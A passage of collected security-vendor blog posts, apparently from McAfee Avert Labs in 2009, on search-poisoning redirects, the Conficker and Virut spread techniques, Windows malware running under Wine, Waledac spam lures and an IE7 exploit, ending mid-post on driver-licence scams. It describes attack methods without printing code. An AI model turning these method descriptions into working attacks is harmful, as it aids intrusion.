In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

One month ago, my colleague Marius Van Oers posted a blog to announce the number of drivers in our DATs passed 500,000. Today, at McAfee reached another record: We received our twenty-millionth malware sample.

In about 22 years, from 1986 to March 2008, 10 million samples piled up in our collection. In just the last 12 months, however, from March 2008 to March 2009, this figure doubled. This pace represents 27,000 samples in a day, or 1,100 each hour.

These figures demonstrate that real-time response is more vital than ever. But it is not sufficient. Faced with such quantity, researchers have to innovate to create sophisticated heuristic detections. And a third need is a multidisciplinary response: Research teams devoted to host intrusions, network intrusions, and ethical vulnerability disclosure also have to play an important part in this battle. As a global research team, McAfee Avert Labs is able to take up the challenge. I’ll just wish “good luck” to all my colleagues.

The third edition of our monthly spam report was released today. This edition discusses some fascinating topics. Key findings include:

Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.

Replica-watch spam has taken over the number one position for holiday spam.

Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?

Putting a dollar value on productivity lost due to spam.

The topic of lost productivity and bringing quantifiable numbers to the impact of spam on a business is particularly interesting and worth a solid read. Download a copy here.

During the last couple of years we have seen malware authors increasingly incorporate the autorun.inf infection vector into malware families–with stunning success. In addition to traditional autorun worms that use this feature, pure-play backdoors, bots, password stealers, and even parasitic viruses that previously required a user to click on an executable file to infect the system have incorporated this technique. While the autorun functionality in operating systems does provide some convenience (it saves a couple of clicks), it has single-handedly revived the 1980s model of hand-carried malware propagation.

Two prolific parasitic virus families that have incorporated this infection vector are W32/Sality and W32/Virut. When a removable drive is inserted into an infected machine, the W32/Sality virus infects Microsoft Notepad or Minesweeper and copies it onto the removable drive. The infected notepad.exe or winmine.exe file is renamed with a random .pif or .scr extension and is accompanied with an obfuscated autorun.inf. Below you’ll see a code snippet and the accompanying autorun.inf file.

Even if the removable drive is cleaned of the virus infection, the random namely Microsoft executable would still exist on the drive. Although benign, the leftover remnants would cause some degree of confusion about the origin of the file. Especially since it’s a renamed Microsoft file with a .pif or .scr extension!

The W32/Virut virus is also known to copy infected notepad.exe files to removable drives. Both these virus families are a royal pain in the posterior to clean. This technique provides a resourceful way for them to reinfect hosts even after cleanup.

The other day a worm, often referred to as “Error Check System” was spreading on Facebook.  In fact if you searched for information on this threat, your search results were poisoned to lead unsuspecting victims to a site that attempts to install a rogue anti-spyware Trojan.  Some folks blogged that this search connection was “too much of a coincidence“, and that the Facebook part of the threat was a “red herring“.  I do not believe this is the case, and here’s why.

Last week I was following up on a comment made to the McAfee Avert Labs blog.  The URL provided by the visitor (**********.******.bee.pl/waledac_botnet.html) redirected to another site that attempted to install the same trojan.  Running a search on part of that URL yielded hundreds of search results, many that were placed high up on Google’s results.  The summary text was relevant for the search term and it’s clear that those behind the redirects are manipulating the internet (Google); by not only getting their newly created sites to appear high on the search results page, but also to display relevant text in the page summary section, and for the hottest terms.  Here’s one example, ironically related to the recent Gmail outage.

You’ll also notice that the page summary is identical to the top search result, taken from Google News.  Looking at more search results it is clear that the attackers are targeting popular search terms.

 Other searches show the results using all lowercase titles, the same as used by Google Trends.  In fact, checking some of the top Google Trends links we can see that the abusers are hitting it (ash wednesday 2009 was the #1 search term at the time of this writing, this is image was edited to fit on the blog).

The notion of malware distributors abusing Google Trends is not new, and received some attention in October of last year.  However, I do not recall previous attacks being as aggressive as the current ones, being distributed across numerous sites, targeting many many high-profile search terms, and having the poisoned links regularly appearing high up in the result pages.

Once a user visits one of these poisoned links, the destination page references a script file (style.js), which is obfuscated.

Decoding the script shows that it redirects the user based on the referring URL being “google”,”msn”,”yahoo”,” comcast”,”aol.com”.  This is just one of the many ways the bad guys focus their attacks on potential victims, while making it a tiny bit more difficult for others to discover it.  Once you’re redirected, it’s situation normal for the attackers, various fake alert and scanning messages and windows appearing, ultimately leading to the installation of a FakeAlert trojan (such as one of the 9,500+ known binaries identified by McAfee as FakeAlert-AB).

If you made it down to the bottom of this blog, I probably don’t need to remind you to look carefully before you click, on the Web.

The year 2009 has so far have a been hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the suspicious user’s workstation was infected with W32/Conficker. What could possibly go wrong from here?

When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry

For the unaware, Wine is an application that enables users to run Windows applications on Unix-like computers. Like many users, I use Wine on my Linux machine to run a couple of Windows applications I cannot do without. I could run these applications on a virtual machine, or even dual-boot with Windows and Linux, but running them in Wine is just easier.

Although running Windows applications in Wine has its advantages, it also comes at a price: bringing Windows malware into Linux. I’m aware that it isn’t Wine’s responsibility to distinguish between a malicious and a nonmalicious file, and that Wine shouldn’t have any problem running a malicious file; however, I had this morbid curiosity to see how well today’s malware would fare running on Wine, and so began an experiment using the following setup:

• Ubuntu Linux 8.04 [comes with Gnome desktop environment]
• Wine 1.0 [run as a nonroot user with default settings]

I decided to choose samples that displayed a cocktail of malicious behavior, and so I chose the following:

File Infectors

W32/Philis is a file infector that apart from appending its code to other executables downloads and drops other malware.

This malware ran without throwing any errors in Wine. It immediately dropped files in the “Windows” and “Windows\System32″ folders and executed these dropped files. It then attempted to connect to a preconfigured site, and downloaded more malware successfully. It also began infecting executables in the Wine directory and created a registry run key for the malicious file.

The screenshot below shows the clean “CProcess.ori,” the original file 35KB in size, and “CProcess.vir,” the infected file 131KB in size.

It’s worth mentioning that the autostart registry key the file infector created will not work under Wine, so applications will not be able to autostart when the Linux machine is booted up. Also, this file infector didn’t seem to infect ELF files. But I’m guessing that a file infector that blindly appends/prepends its code to other files shouldn’t have any problem corrupting ELF files.

Autorun Malware

W32/Autorun.Worm.CP is an autorun worm, which drops autorun.inf in the root of removable drives.

This malware also ran without any errors. It dropped both the malicious files and the associated autorun.inf file in the C:\ drive and attached removable devices, and created a registry run key.

The screenshot below shows the created Autorun.inf file, along with the malicious files that were created in the root of the removable device.

The registry run key created by the malware won’t work in Wine, however. As long as the malicious file is running, any new removable devices connected to the machine will get infected, thus making a Linux machine the origin of an infection.

Although it is difficult for malware to autostart in Wine, it is not impossible. Malware can be written to find out if it is running in Wine. It can then either download a Linux binary onto the machine and/or simply add an autostart entry for itself in the Linux desktop environment’s common autostart locations, using the nonroot user’s credentials.

IRC Trojans

IRC/Contact malware drops files and connects to a preconfigured IRC server. This IRC Trojan, when ran in Wine, connected to the preconfigured IRC server. From the IRC server I was able to connect to the bot, and control it. Though the control was limited, I was still able to list the files under the Wine directory, get system information, download files to the Linux machine remotely, etc.

The screen shot below shows my logging into the infected Linux machine and issuing commands:

Click here for larger version of the image.

The screen shot below shows the infected machine responding to the “getinfo” command issued from the IRC channel:

Click here for a larger version of the image.

This IRC Trojan was very simple in features, but I’m guessing that with a complex one, an attacker shouldn’t have any problem scanning the subnet for an exploit and sending a payload to infect Windows machines.

Keyloggers/Password Stealers

Apart from this, I tried running a couple of password stealers and keyloggers, but I couldn’t find one that worked well. I’m guessing they couldn’t get a hook to the keyboard.

Although stealing information using a Windows malware in Wine is difficult, an infected Linux machine can still contribute to a DOS attack or be the origin of an infection as suggested earlier.

Scareware

This class of malware displays falsely exaggerated scan reports and tricks users into buying them. They utilize extreme social-engineering tactics combined with obfuscated Java scripts that check for exploits on the machine.

Although I didn’t run the Scareware installer in Wine, I did browse through a site that ran a JavaScript to pop up a window informing me that my “Windows” machine was infected, and requested that I install the malicious file.

Screen shots below:

Click here for a larger screen shot.

It is important to note that if the user had set the file association for Windows executables with Wine, then simply double-clicking the downloaded file would run the malware.

Mitigation Techniques

• Never run Wine applications as root.
• Wine maps the root directory, the user’s home directory, CD ROMs and removable devices found, and these mappings are listed in “~/.wine/dosdevices/”. Consider deleting these except the link to your drive_c.
• Do not set the file association for Windows executables with Wine. This would enable the running of Windows executables in Wine by simply double-clicking them.
• Administrators should think twice before installing Wine on a Linux server. These machines are seldom turned off, and so the problem that a malware faces in Wine with respect to autostarting its code when the machine boots up, I mentioned this earlier, would become void.

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

An exploit found to be targeting a recently patched vulnerability for Internet Explorer 7 was discovered in-the-wild.  Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical with the possibility of a consistent exploit code. The modus operandi bears close resemblance to the zero-day attack using word documents, we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This word document contains an embedded ActiveX control which upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious word document is detected with the current DATS as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

A picture with two adorable Shih Tzu puppies is wishing a Happy Valentine’s Day. The text of the lure is advertizing a “Valentine Devkit” named loveexe.exe or start.exe. And regular readers can guess it already: This is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

A close look into the website’s source code doesn’t currently reveal any additional drive-by infections nor downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs, plus blocked by Artemis, plus blocked at the (former Secure) Web Gateway as well.

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

Since at least the year 2000, email scams have circulated around the net for the selling of International Driver Licenses. The authors explained that with their documents buyers could avoid having to pay traffic tickets as well as allowing them to establish new identities for hotel check-ins or bar entrance (if the buyers are underage). Lately these offers have put on weight.

Yesterday, I came across such an ad; it was in French and promoted a site offering a replacement driver license in place of a regular one:

Due to its name of (backdoordl), the website aroused my curiosity. I followed the link and, one thing leading to another, I discovered the extent of this fraud.

At backdoordl, I found a professional website divided into three areas: French, German and English.

In the UK area, I recognized text that was similar to what I first saw in French:

Have you lost your existing licence? No problem! Can’t remember the details? No problem! Need a clean licence? No problem! Need motorcycle, car, bus, hgv entitlement? No problem! Over 65? No problem! Medical problems? No problem!

There are 110 models of drivers licences in current use throughout the European Union, that’s not to mention drivers licences issued outside of the EU that are still accepted for exchange in different EU countries. This service is directed at any resident or non-resident of the United Kingdom or EU that wishes to obtain a full driving licence without any tests. So no matter what country you are a resident or citizen of, they claim they can help. Even if you live outside of the UK or EU! Once you have a driving licence through them, you can exchange it in your own country for a local licence. EU driving licences are accepted ‘as is’ worldwide for driving and exchange. It does not matter what nationality you are!

The office address, undoubtedly fake, written into the contact page was in the UK. There was no phone number; they said it would be provided only to clients who ordered. Despite some inconsistencies here and there, it was also explained the company did not accept any postal contact.  Because photo and signature were needed to create the new driving license, they had to be scanned by the buyer and then sent via email.

The registrar was ENOM Inc. and registration details protected via “WhoisGuard” service thus masking the true identity of the domain-name registrant and preventing public access to that information through its (and any) WHOIS database.

Getting on with my searches, I discovered the backdoordl site was not unique. Almost half a dozen nearly exact copies were also easily available online:

Domain registrants&#